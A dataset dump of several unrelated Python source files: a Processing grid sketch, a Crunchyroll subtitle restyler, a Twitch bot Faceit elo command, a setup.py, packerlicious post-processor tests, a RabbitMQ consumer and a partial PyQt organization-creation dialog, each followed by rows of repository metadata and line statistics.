    """Draw a 10x5 grid of randomly coloured square pairs while `flug` is set.

    NOTE(review): colours are re-randomised every frame while flug stays
    True, so the grid flickers — confirm that is the intended effect.
    """
    global i, j, flug
    if(flug):
        for i in range(10):
            for j in range(5):
                # HSB fill: hue fixed at 10, random saturation/brightness.
                fill(10, random(0, 255), random(10, 250))
                rect(j*40+50, i*40+50, 35, 35)
                # Mirrored square on the other half of the canvas.
                rect((10-j)*40+10, i*40+50, 35, 35)
def mouseClicked():
    """Toggle the drawing flag on mouse click.

    Fix: the original assigned to a *local* `flug` (missing the `global`
    declaration), so clicking had no effect on draw().
    """
    global flug
    flug = not flug
| 22.35
| 61
| 0.478747
| 68
| 447
| 3.147059
| 0.485294
| 0.056075
| 0.046729
| 0.065421
| 0.084112
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180851
| 0.369128
| 447
| 19
| 62
| 23.526316
| 0.578014
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157895
| false
| 0
| 0
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758b72cef82f8f852b093d91ef15a93d7537c56c
| 3,758
|
py
|
Python
|
ssfunc/fansub.py
|
End-of-Eternity/ssfunc
|
5adbd5602ebc1db1a3cc3483c759c936d24ad705
|
[
"MIT"
] | 3
|
2021-07-20T22:25:36.000Z
|
2021-12-07T10:05:41.000Z
|
ssfunc/fansub.py
|
End-of-Eternity/ssfunc
|
5adbd5602ebc1db1a3cc3483c759c936d24ad705
|
[
"MIT"
] | null | null | null |
ssfunc/fansub.py
|
End-of-Eternity/ssfunc
|
5adbd5602ebc1db1a3cc3483c759c936d24ad705
|
[
"MIT"
] | 1
|
2021-09-20T19:09:55.000Z
|
2021-09-20T19:09:55.000Z
|
import ass
import subdigest
import subprocess
import os
def dump_subs(subsfile: str, subsdata: subdigest.Subtitles):
    """
    Write subsdata out to subsfile by hand (rather than via dump_file())
    so the utf-8 encode warning is avoided.
    """
    with open(subsfile, "w", encoding="utf_8_sig") as out:
        for section in subsdata.sections.values():
            body = "\n".join(section.dump())
            out.write(body + "\n\n")
def load_subs(subsfile: str):
    """
    Open subsfile, parse it, and return the resulting subdigest object.
    """
    with open(subsfile, encoding="utf_8_sig") as fh:
        return subdigest.Subtitles(ass.parse(fh), subsfile)
def crunchy_unroll(infile: str = None, styles: str = None):
    """
    Restyles Crunchyroll subtitles using an external `styles` file.

    Parameters
    ----------
    infile : str
        Input `.ass` subtitle file, or an `.mkv` whose subtitle track is
        demuxed first.  Required despite the None default.
    styles : str
        `.ass` file whose styles are copied onto the output.  Required.

    Side effects: runs mkvextract / aegisub-cli / prass / mkvmerge, writes
    `<infile>_fixed.*`, and removes the intermediate files.
    """
    from util import get_episode_number
    # Fix: both parameters defaulted to None but were used unconditionally,
    # which crashed with an opaque AttributeError mid-pipeline.  Fail fast.
    if infile is None or styles is None:
        raise ValueError("crunchy_unroll() requires both `infile` and `styles`")
    if infile.endswith(".ass"):
        print("Processing subtitles.")
    elif infile.endswith(".mkv"):
        print("Demuxing subtitles")
        subprocess.run(["mkvextract", "-q", "tracks", infile, f"2:{infile}.ass"])
        infile += ".ass"
        print("Processing subtitles.")
    subs = load_subs(infile)
    # Crunchyroll bad
    subs.selection_set("style", "Top$")
    subs.modify_field("text", "^", r"{\\an8}")
    subs.modify_field("text", "}{", "")
    subs.selection_set("style", "^Italics")
    subs.modify_field("text", "^", r"{\\i1}")
    subs.modify_field("text", "}{", "")
    subs.selection_set("style", "^Main")
    subs.modify_field("style", "^.*", "Dialogue")
    subs.selection_set("style", "^Flashback")
    subs.modify_field("style", "^.*", "Flashback")
    subs.selection_set("style", "Top$")
    subs.modify_field("style", "^.*", "Alt")
    subs.selection_set("style", "^Italics")
    subs.modify_field("style", "^.*", "Dialogue")
    # nuke \N tags
    # NOTE(review): the last three patterns below look redundant after the
    # first two generic ones — confirm against subdigest.modify_field
    # semantics before removing them.
    subs.modify_field("text", r"\s*{\\i0}\s*\\N\s*{\\i1}\s*", " ")
    subs.modify_field("text", r"\s*\\[Nn]\s*", " ")
    subs.modify_field("text", r"\s*\\[Nn]", " ")
    subs.modify_field("text", r"\\[Nn]\s*", " ")
    subs.modify_field("text", r"\\[Nn]", " ")
    # misc
    subs.modify_field("text", "--", "—")
    subs.use_styles()
    subs.set_script_info("YCbCr Matrix", "TV.709")
    subs.set_script_info("Script Updated By", "SeaSmoke")
    # dump subs to temp file
    ep = get_episode_number(infile)
    temp = f"{ep}_temp.ass"
    dump_subs(temp, subs)
    # Loading video for resampling
    video = infile.replace(".ass", "")
    # Resampling subs using aegisub-cli
    subprocess.run(["aegisub-cli", "--video", video, temp, temp, "tool/resampleres"])
    # Copying styles from `styles` using prass
    subprocess.run(
        [
            "python",
            "-m",
            "prass",
            "copy-styles",
            "--from",
            styles,
            "--to",
            temp,
            "-o",
            temp,
        ]
    )
    # export subs file
    subs = load_subs(temp)
    dump_subs(infile.replace(".ass", "_fixed.ass"), subs)
    # mux subs back into video
    subprocess.run(
        [
            "mkvmerge",
            "-o",
            infile.replace(".ass", "").replace(".mkv", "_fixed.mkv"),
            "-S",
            "-A",
            "--language",
            "0:und",
            video,
            "-D",
            "-S",
            "--language",
            "1:jpn",
            video,
            "-D",
            "-A",
            "--language",
            "0:en",
            "--track-name",
            "0:[Smoke]",
            infile.replace(".ass", "_fixed.ass"),
        ]
    )
    # Removing temporary files
    os.remove(temp)
    os.remove(infile)
    os.remove(infile.replace(".ass", "_fixed.ass"))
    print("Done!")
| 26.842857
| 99
| 0.537254
| 424
| 3,758
| 4.65566
| 0.34434
| 0.070922
| 0.106383
| 0.096251
| 0.251266
| 0.188956
| 0.148936
| 0.137285
| 0
| 0
| 0
| 0.005535
| 0.278872
| 3,758
| 139
| 100
| 27.035971
| 0.722509
| 0.123204
| 0
| 0.284211
| 0
| 0
| 0.20679
| 0.008333
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031579
| false
| 0
| 0.052632
| 0
| 0.094737
| 0.042105
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758bfb17d11799615d242c0ec597dafd07b4d3fa
| 1,955
|
py
|
Python
|
tbot/twitch_bot/functions/faceit.py
|
thomaserlang/tbot
|
99cfa204d86ef35cf2cc9482ae5a44abb35b443a
|
[
"MIT"
] | null | null | null |
tbot/twitch_bot/functions/faceit.py
|
thomaserlang/tbot
|
99cfa204d86ef35cf2cc9482ae5a44abb35b443a
|
[
"MIT"
] | 10
|
2022-02-14T11:40:20.000Z
|
2022-03-09T22:44:03.000Z
|
tbot/twitch_bot/functions/faceit.py
|
thomaserlang/tbot
|
99cfa204d86ef35cf2cc9482ae5a44abb35b443a
|
[
"MIT"
] | 1
|
2020-09-19T16:38:24.000Z
|
2020-09-19T16:38:24.000Z
|
import logging
from tbot.twitch_bot.var_filler import fills_vars, Send_error
from tbot import config
@fills_vars('faceit.username', 'faceit.elo', 'faceit.level',
            'faceit.next_level_points', 'faceit.next_level')
async def faceit_elo(bot, channel, args, var_args, **kwargs):
    """
    Fill the faceit.* chat variables with a user's CSGO stats.

    Looks the user up in the Faceit open-data API and returns their current
    elo, skill level label, and the points/level needed for the next level.

    Raises Send_error when the username argument is missing, the user is
    unknown, the API returns an error, or the profile has no CSGO game.
    """
    if not var_args or \
            not 'faceit.username' in var_args or \
            not var_args['faceit.username']:
        raise Send_error('{faceit.username <username>} is missing')
    params = {
        'nickname': var_args['faceit.username'][0]
    }
    headers = {
        'Authorization': f'Bearer {config["faceit_apikey"]}',
    }
    # (minimum elo of each level, level label)
    elos = (
        (1, '1'),
        (801, '2'),
        (951, '3'),
        (1101, '4'),
        (1251, '5'),
        (1401, '6'),
        (1551, '7'),
        (1701, '8'),
        (1851, '9'),
        (2001, '10'),
    )
    async with bot.ahttp.get('https://open.faceit.com/data/v4/players', params=params, headers=headers) as r:
        if r.status == 404:
            # Fix: corrected "Unknow" typo in the user-facing message.
            raise Send_error('Unknown user on Faceit (usernames are case sensitive)')
        elif r.status >= 400:
            error = await r.text()
            raise Send_error(f'Faceit error: {error}')
        d = await r.json()
    if 'csgo' not in d['games']:
        raise Send_error('The user does not have CSGO in their Faceit profile')
    next_level_points = 0
    next_level = 'unknown'
    # Find the highest threshold below the current elo; the entry after it
    # is the next level and its threshold gives the points still needed.
    for i, e in enumerate(elos):
        if e[0] < d['games']['csgo']['faceit_elo']:
            if i+1 < len(elos):
                next_level = elos[i+1][1]
                next_level_points = elos[i+1][0] - d['games']['csgo']['faceit_elo']
    return {
        'faceit.username': '',
        'faceit.elo': d['games']['csgo']['faceit_elo'],
        'faceit.level': d['games']['csgo']['skill_level_label'],
        'faceit.next_level_points': next_level_points,
        'faceit.next_level': next_level,
    }
| 34.298246
| 109
| 0.544246
| 247
| 1,955
| 4.161943
| 0.408907
| 0.087549
| 0.072957
| 0.046693
| 0.115759
| 0.097276
| 0
| 0
| 0
| 0
| 0
| 0.044364
| 0.296675
| 1,955
| 57
| 110
| 34.298246
| 0.703273
| 0
| 0
| 0
| 0
| 0
| 0.289366
| 0.037321
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.078431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758d3ae4874f3aae353700d2388d8c12f38f9087
| 740
|
py
|
Python
|
setup.py
|
nickzhuang0613/BaiduSpider
|
f7c2dfc917c8617a8f5f3691bac642c376faed0f
|
[
"MIT"
] | 1
|
2021-03-13T04:35:34.000Z
|
2021-03-13T04:35:34.000Z
|
setup.py
|
nickzhuang0613/BaiduSpider
|
f7c2dfc917c8617a8f5f3691bac642c376faed0f
|
[
"MIT"
] | null | null | null |
setup.py
|
nickzhuang0613/BaiduSpider
|
f7c2dfc917c8617a8f5f3691bac642c376faed0f
|
[
"MIT"
] | null | null | null |
import setuptools

# The long description is taken verbatim from the README.
with open('README.md', 'r', encoding='utf-8') as readme:
    long_description = readme.read()

setuptools.setup(
    name='BaiduSpider',
    version='0.0.6',
    author='Sam Zhang',
    author_email='samzhang951@outlook.com',
    description='BaiduSpider,一个爬取百度的利器',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/BaiduSpider/BaiduSpider',
    packages=setuptools.find_packages(),
    classifiers=[
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: MIT License',
        'Development Status :: 3 - Alpha',
    ],
    python_requires='>=3.6',
    install_requires=['requests', 'bs4', 'htmlmin'],
)
| 26.428571
| 53
| 0.636486
| 78
| 740
| 5.910256
| 0.705128
| 0.130152
| 0.08243
| 0.130152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02069
| 0.216216
| 740
| 27
| 54
| 27.407407
| 0.774138
| 0
| 0
| 0
| 0
| 0
| 0.359459
| 0.059459
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759471eca6eb7bbbb400247ad8d624471bce9b4f
| 979
|
py
|
Python
|
tests/packerlicious/test_post_processor_docker.py
|
gnewson/packerlicious
|
9a5373bc3a63f949e7912dad0214340d5fddbd85
|
[
"Apache-2.0"
] | 109
|
2017-07-17T03:32:09.000Z
|
2022-02-27T18:24:18.000Z
|
tests/packerlicious/test_post_processor_docker.py
|
gnewson/packerlicious
|
9a5373bc3a63f949e7912dad0214340d5fddbd85
|
[
"Apache-2.0"
] | 175
|
2017-07-16T21:41:40.000Z
|
2021-03-19T22:28:19.000Z
|
tests/packerlicious/test_post_processor_docker.py
|
gnewson/packerlicious
|
9a5373bc3a63f949e7912dad0214340d5fddbd85
|
[
"Apache-2.0"
] | 68
|
2017-07-16T20:52:38.000Z
|
2022-01-08T18:24:17.000Z
|
import pytest
import packerlicious.post_processor as post_processor
class TestDockerImportPostProcessor(object):
    """DockerImport must refuse to serialise while required fields are unset."""

    def test_required_fields_missing(self):
        with pytest.raises(ValueError, match='required'):
            post_processor.DockerImport().to_dict()
class TestDockerPushPostProcessor(object):
    """DockerPush has no required fields, so a bare to_dict() must succeed."""

    def test_no_required_fields(self):
        post_processor.DockerPush().to_dict()
class TestDockerSavePostProcessor(object):
    """DockerSave must refuse to serialise while required fields are unset."""

    def test_required_fields_missing(self):
        with pytest.raises(ValueError, match='required'):
            post_processor.DockerSave().to_dict()
class TestDockerTagPostProcessor(object):
    """DockerTag must refuse to serialise while required fields are unset."""

    def test_required_fields_missing(self):
        with pytest.raises(ValueError, match='required'):
            post_processor.DockerTag().to_dict()
| 23.309524
| 53
| 0.694586
| 109
| 979
| 6.036697
| 0.311927
| 0.118541
| 0.079027
| 0.109422
| 0.585106
| 0.585106
| 0.585106
| 0.585106
| 0.585106
| 0.585106
| 0
| 0
| 0.223698
| 979
| 41
| 54
| 23.878049
| 0.865789
| 0
| 0
| 0.541667
| 0
| 0
| 0.024515
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7598e6392d65a78f154a1a2db4cb51bdef6f7043
| 3,017
|
py
|
Python
|
app/app.py
|
jemarulanda/microservicioMapeo
|
fbf3cef57a0a8aec611171460f4a3434339aa0fe
|
[
"MIT"
] | null | null | null |
app/app.py
|
jemarulanda/microservicioMapeo
|
fbf3cef57a0a8aec611171460f4a3434339aa0fe
|
[
"MIT"
] | null | null | null |
app/app.py
|
jemarulanda/microservicioMapeo
|
fbf3cef57a0a8aec611171460f4a3434339aa0fe
|
[
"MIT"
] | null | null | null |
'''Module main'''
import json
import os
from rabbitmq import RabbitMQ
from pika import exceptions
from parameter import Parameter
from send_grid import SendGrid
from traceability import Traceability
from transform import Transform
import uuid
class App:
    '''Consume messages from a RabbitMQ queue, transform them, and report
    failures by email; reconnects automatically on broker errors.'''

    # NOTE(review): __init__ is a @classmethod, so all "instance" state is
    # actually class-level — confirm this is intentional before refactoring.
    @classmethod
    def __init__(cls):
        '''Load Azure storage credentials from the environment and fetch the
        application configuration.'''
        cls.accountName = os.getenv('ACCOUNT_NAME')
        print('cls.accountName ', cls.accountName)
        # Fix: this assignment had been commented out while cls.accountKey was
        # still read below, which raised AttributeError on startup.
        cls.accountKey = os.getenv('ACCOUNT_KEY')
        print('cls.accountKey ', cls.accountKey)
        cls.config = Parameter(cls.accountName, cls.accountKey).get_parameters()

    @classmethod
    def callback(cls, channel, method, properties, body):
        '''Receive one message: decode it, run the transformation, and email
        any failure via SendGrid.  The message is always acked.'''
        try:
            del properties
            # transaction_id / businessKey feed the (currently disabled)
            # traceability calls below.
            transaction_id = str(uuid.uuid4())
            businessKey = cls.config['traceability']['businessKey']
            data = json.loads(body.decode('utf-8'))
            #print(data)
            #ibmmq(**cls.config['traceability']).send_json('message')
            #Traceability(**cls.config['traceability']).save(
            #    businessKey,transaction_id,"Desencolar topico",
            #    "Subscriber-Callback", "IN", str(data),
            #    "OK", "Mensaje recibido")
            print('Transform.transformacion(data)', Transform.transformacion(data))
        except Exception as error:
            # Broad catch is deliberate here: this is the consumer boundary,
            # and every failure is surfaced by email.
            print(error)
            SendGrid().create_message(
                cls.config['sendGrid']['apiKey'],
                cls.config['sendGrid']['fromEmail'],
                cls.config['sendGrid']['toEmail'],
                str(error))
            #Traceability(**cls.config['traceability']).save(
            #    businessKey,transaction_id,"Error en la calidad del mensaje enviado",
            #    "Subscriber", "IN", str(body),
            #    "ERROR", "Lectura Fallida, "+str(error))
        finally:
            # Ack in all cases so a poison message cannot block the queue.
            channel.basic_ack(delivery_tag=method.delivery_tag)

    @classmethod
    def main(cls):
        '''Consume the source queue forever; reconnect on broker/connection
        errors and stop cleanly on Ctrl-C.'''
        while True:
            try:
                objqueue = RabbitMQ(**cls.config['source'])
                objqueue.connect()
                objqueue.channel.basic_consume(
                    queue=cls.config['source']['queue'],
                    on_message_callback=cls.callback,
                    auto_ack=False
                )
                #cls.traceability = Traceability(**cls.config['traceability'])
                try:
                    objqueue.channel.start_consuming()
                except KeyboardInterrupt:
                    objqueue.disconnect()
                    objqueue.channel.stop_consuming()
                    break
            except (exceptions.ConnectionClosedByBroker, exceptions.AMQPChannelError, exceptions.AMQPConnectionError) as error_connection:
                print('Conexion cerrada con a RabbitMQ', error_connection)
                continue
if __name__ == '__main__':
    # Script entry point: construct App (loads env credentials and config)
    # and start the consume loop.
    App().main()
| 38.679487
| 136
| 0.569108
| 269
| 3,017
| 6.263941
| 0.39777
| 0.058754
| 0.062315
| 0.058754
| 0.072404
| 0.072404
| 0.072404
| 0.072404
| 0
| 0
| 0
| 0.000973
| 0.318528
| 3,017
| 77
| 137
| 39.181818
| 0.81858
| 0.201525
| 0
| 0.109091
| 0
| 0
| 0.085402
| 0.012621
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.163636
| 0
| 0.236364
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759923fc156d69b7e7b7231814ffe05abf19e1c1
| 26,488
|
py
|
Python
|
modules/organizations_tab.py
|
scrummastermind/sumologictoolbox
|
02d9acb970943521685091d36b8d5135e817c22c
|
[
"Apache-2.0"
] | null | null | null |
modules/organizations_tab.py
|
scrummastermind/sumologictoolbox
|
02d9acb970943521685091d36b8d5135e817c22c
|
[
"Apache-2.0"
] | null | null | null |
modules/organizations_tab.py
|
scrummastermind/sumologictoolbox
|
02d9acb970943521685091d36b8d5135e817c22c
|
[
"Apache-2.0"
] | null | null | null |
# Presumably read by the application's tab loader to locate this module's
# tab class by name — verify against the loader code.
class_name = 'organizations_tab'
from qtpy import QtCore, QtGui, QtWidgets, uic
import os
from logzero import logger
import pathlib
import json
from modules.sumologic_orgs import SumoLogic_Orgs
class CreateOrUpdateOrgDialog(QtWidgets.QDialog):
    """Modal dialog collecting the fields needed to create a Sumo Logic org
    or update an existing org's subscription.

    With `org_details` supplied, identity fields are pre-filled and made
    read-only (update mode); without it the form starts blank (create mode).
    """

    def __init__(self, deployments, org_details=None, trials_enabled=False):
        # deployments: iterable of dicts carrying a 'deploymentId' key.
        # org_details: existing org record for update mode, or None to create.
        # trials_enabled: offer a "Trial" license — only when creating.
        super(CreateOrUpdateOrgDialog, self).__init__()
        self.deployments = deployments
        self.available_org_licenses = ["Paid"]
        if trials_enabled and not org_details:
            self.available_org_licenses.append("Trial")
        self.org_details = org_details
        self.setupUi(self)

    def setupUi(self, Dialog):
        """Build the form programmatically: identity fields, deployment and
        license pickers, per-tier baseline inputs, and (create mode only)
        the credential checkboxes."""
        Dialog.setObjectName("CreateOrg")
        self.intValidator = QtGui.QIntValidator()
        self.setWindowTitle('Enter Org Details')
        QBtn = QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel
        self.buttonBox = QtWidgets.QDialogButtonBox(QBtn)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)
        # Identity fields: each is a label + line edit in a horizontal row.
        self.labelOrgName = QtWidgets.QLabel(Dialog)
        self.labelOrgName.setObjectName("OrgName")
        self.labelOrgName.setText('Organization Name:')
        self.lineEditOrgName = QtWidgets.QLineEdit(Dialog)
        self.layoutOrgName = QtWidgets.QHBoxLayout()
        self.layoutOrgName.addWidget(self.labelOrgName)
        self.layoutOrgName.addWidget(self.lineEditOrgName)
        self.labelEmail = QtWidgets.QLabel(Dialog)
        self.labelEmail.setObjectName("Email")
        self.labelEmail.setText('Registration Email:')
        self.lineEditEmail = QtWidgets.QLineEdit(Dialog)
        self.layoutEmail = QtWidgets.QHBoxLayout()
        self.layoutEmail.addWidget(self.labelEmail)
        self.layoutEmail.addWidget(self.lineEditEmail)
        self.labelFirstName = QtWidgets.QLabel(Dialog)
        self.labelFirstName.setObjectName("FirstName")
        self.labelFirstName.setText('First Name:')
        self.lineEditFirstName = QtWidgets.QLineEdit(Dialog)
        self.layoutFirstName = QtWidgets.QHBoxLayout()
        self.layoutFirstName.addWidget(self.labelFirstName)
        self.layoutFirstName.addWidget(self.lineEditFirstName)
        self.labelLastName = QtWidgets.QLabel(Dialog)
        self.labelLastName.setObjectName("LastName")
        self.labelLastName.setText('Last Name:')
        self.lineEditLastName = QtWidgets.QLineEdit(Dialog)
        self.layoutLastName = QtWidgets.QHBoxLayout()
        self.layoutLastName.addWidget(self.labelLastName)
        self.layoutLastName.addWidget(self.lineEditLastName)
        self.labelDeployment = QtWidgets.QLabel(Dialog)
        self.labelDeployment.setObjectName("Deployment")
        self.labelDeployment.setText('Deployment:')
        self.comboBoxDeployment = QtWidgets.QComboBox(Dialog)
        for deployment in self.deployments:
            self.comboBoxDeployment.addItem(deployment['deploymentId'].strip())
        self.layoutDeployment = QtWidgets.QHBoxLayout()
        self.layoutDeployment.addWidget(self.labelDeployment)
        self.layoutDeployment.addWidget(self.comboBoxDeployment)
        self.labelLicenseType = QtWidgets.QLabel(Dialog)
        self.labelLicenseType.setObjectName("LicenseType")
        self.labelLicenseType.setText('License Type:')
        self.comboBoxLicenseType = QtWidgets.QComboBox(Dialog)
        # NOTE(review): loop variable shadows the builtin `license`.
        for license in self.available_org_licenses:
            self.comboBoxLicenseType.addItem(license.strip())
        self.layoutLicenseType = QtWidgets.QHBoxLayout()
        self.layoutLicenseType.addWidget(self.labelLicenseType)
        self.layoutLicenseType.addWidget(self.comboBoxLicenseType)
        self.labelTrialLength = QtWidgets.QLabel(Dialog)
        self.labelTrialLength.setObjectName('TrialLength')
        self.labelTrialLength.setText('Trial Length')
        self.lineEditTrialLength = QtWidgets.QLineEdit(Dialog)
        # Temporarily Disabled for V1 of Orgs. Trial length is fixed at 45 days
        self.lineEditTrialLength.setText('45')
        self.lineEditTrialLength.setReadOnly(True)
        self.layoutTrialLength = QtWidgets.QHBoxLayout()
        self.layoutTrialLength.addWidget(self.labelTrialLength)
        self.layoutTrialLength.addWidget(self.lineEditTrialLength)
        if self.org_details:
            # Update mode: identity fields are fixed and shown read-only.
            self.lineEditOrgName.setText(self.org_details['organizationName'])
            self.lineEditOrgName.setReadOnly(True)
            self.lineEditEmail.setText(self.org_details['email'])
            self.lineEditEmail.setReadOnly(True)
            self.lineEditFirstName.setText(self.org_details['firstName'])
            self.lineEditFirstName.setReadOnly(True)
            self.lineEditLastName.setText(self.org_details['lastName'])
            self.lineEditLastName.setReadOnly(True)
            index = self.comboBoxLicenseType.findText(self.org_details['subscription']['plan']['planName'],
                                                      QtCore.Qt.MatchFixedString)
            if index >= 0:
                self.comboBoxLicenseType.setCurrentIndex(index)
            self.comboBoxLicenseType.setEditable(False)
        # NOTE(review): self.layout shadows QWidget.layout(); works, but
        # fragile if anyone later calls the method form.
        self.layout = QtWidgets.QVBoxLayout()
        self.layout.addLayout(self.layoutOrgName)
        self.layout.addLayout(self.layoutEmail)
        self.layout.addLayout(self.layoutFirstName)
        self.layout.addLayout(self.layoutLastName)
        self.layout.addLayout(self.layoutDeployment)
        self.layout.addLayout(self.layoutLicenseType)
        self.layout.addLayout(self.layoutTrialLength)
        # Continuous
        self.labelContinuousTierIngest = QtWidgets.QLabel(Dialog)
        self.labelContinuousTierIngest.setObjectName("ContinuousTierIngest")
        self.labelContinuousTierIngest.setText('Continuous Tier Ingest (0 - 1,000,000 GB/day):')
        self.lineEditContinuousTierIngest = QtWidgets.QLineEdit(Dialog)
        self.lineEditContinuousTierIngest.setValidator(self.intValidator)
        self.layoutContinuousTierIngest = QtWidgets.QHBoxLayout()
        self.layoutContinuousTierIngest.addWidget(self.labelContinuousTierIngest)
        self.layoutContinuousTierIngest.addWidget(self.lineEditContinuousTierIngest)
        self.labelContinuousTierStorage = QtWidgets.QLabel(Dialog)
        self.labelContinuousTierStorage.setObjectName("ContinuousTierStorage")
        self.labelContinuousTierStorage.setText('Continuous Tier Storage (0 - 1,000,000 GB):')
        self.lineEditContinuousTierStorage = QtWidgets.QLineEdit(Dialog)
        self.lineEditContinuousTierStorage.setValidator(self.intValidator)
        self.layoutContinuousTierStorage = QtWidgets.QHBoxLayout()
        self.layoutContinuousTierStorage.addWidget(self.labelContinuousTierStorage)
        self.layoutContinuousTierStorage.addWidget(self.lineEditContinuousTierStorage)
        # Frequent
        self.labelFrequentTierIngest = QtWidgets.QLabel(Dialog)
        self.labelFrequentTierIngest.setObjectName("FrequentTierIngest")
        self.labelFrequentTierIngest.setText('Frequent Tier Ingest (0 - 1,000,000 GB/day):')
        self.lineEditFrequentTierIngest = QtWidgets.QLineEdit(Dialog)
        self.lineEditFrequentTierIngest.setValidator(self.intValidator)
        self.layoutFrequentTierIngest = QtWidgets.QHBoxLayout()
        self.layoutFrequentTierIngest.addWidget(self.labelFrequentTierIngest)
        self.layoutFrequentTierIngest.addWidget(self.lineEditFrequentTierIngest)
        self.labelFrequentTierStorage = QtWidgets.QLabel(Dialog)
        self.labelFrequentTierStorage.setObjectName("FrequentTierStorage")
        self.labelFrequentTierStorage.setText('Frequent Tier Storage (0 - 1,000,000 GB):')
        self.lineEditFrequentTierStorage = QtWidgets.QLineEdit(Dialog)
        self.lineEditFrequentTierStorage.setValidator(self.intValidator)
        self.layoutFrequentTierStorage = QtWidgets.QHBoxLayout()
        self.layoutFrequentTierStorage.addWidget(self.labelFrequentTierStorage)
        self.layoutFrequentTierStorage.addWidget(self.lineEditFrequentTierStorage)
        # Infrequent
        self.labelInFrequentTierIngest = QtWidgets.QLabel(Dialog)
        self.labelInFrequentTierIngest.setObjectName("InFrequentTierIngest")
        self.labelInFrequentTierIngest.setText('InFrequent Tier Ingest (0 - 1,000,000 GB/day):')
        self.lineEditInFrequentTierIngest = QtWidgets.QLineEdit(Dialog)
        self.lineEditInFrequentTierIngest.setValidator(self.intValidator)
        self.layoutInFrequentTierIngest = QtWidgets.QHBoxLayout()
        self.layoutInFrequentTierIngest.addWidget(self.labelInFrequentTierIngest)
        self.layoutInFrequentTierIngest.addWidget(self.lineEditInFrequentTierIngest)
        self.labelInFrequentTierStorage = QtWidgets.QLabel(Dialog)
        self.labelInFrequentTierStorage.setObjectName("InFrequentTierStorage")
        self.labelInFrequentTierStorage.setText('InFrequent Tier Storage (0 - 1,000,000 GB):')
        self.lineEditInFrequentTierStorage = QtWidgets.QLineEdit(Dialog)
        self.lineEditInFrequentTierStorage.setValidator(self.intValidator)
        self.layoutInFrequentTierStorage = QtWidgets.QHBoxLayout()
        self.layoutInFrequentTierStorage.addWidget(self.labelInFrequentTierStorage)
        self.layoutInFrequentTierStorage.addWidget(self.lineEditInFrequentTierStorage)
        # Metrics
        self.labelMetrics = QtWidgets.QLabel(Dialog)
        self.labelMetrics.setObjectName("Metrics")
        self.labelMetrics.setText('Metrics Ingest (0 - 100,000 DPM):')
        self.lineEditMetrics = QtWidgets.QLineEdit(Dialog)
        self.lineEditMetrics.setValidator(self.intValidator)
        self.layoutMetrics = QtWidgets.QHBoxLayout()
        self.layoutMetrics.addWidget(self.labelMetrics)
        self.layoutMetrics.addWidget(self.lineEditMetrics)
        # CSE
        self.labelCSEIngest = QtWidgets.QLabel(Dialog)
        self.labelCSEIngest.setObjectName("CSEIngest")
        self.labelCSEIngest.setText('CSE Ingest (0 - 1,000,000 GB/day):')
        self.lineEditCSEIngest = QtWidgets.QLineEdit(Dialog)
        self.lineEditCSEIngest.setValidator(self.intValidator)
        self.layoutCSEIngest = QtWidgets.QHBoxLayout()
        self.layoutCSEIngest.addWidget(self.labelCSEIngest)
        self.layoutCSEIngest.addWidget(self.lineEditCSEIngest)
        self.labelCSEStorage = QtWidgets.QLabel(Dialog)
        self.labelCSEStorage.setObjectName("CSEStorage")
        self.labelCSEStorage.setText('CSE Storage (0 - 1,000,000 GB):')
        self.lineEditCSEStorage = QtWidgets.QLineEdit(Dialog)
        self.lineEditCSEStorage.setValidator(self.intValidator)
        self.layoutCSEStorage = QtWidgets.QHBoxLayout()
        self.layoutCSEStorage.addWidget(self.labelCSEStorage)
        self.layoutCSEStorage.addWidget(self.lineEditCSEStorage)
        if self.org_details:
            # Update mode: seed baselines from the existing subscription.
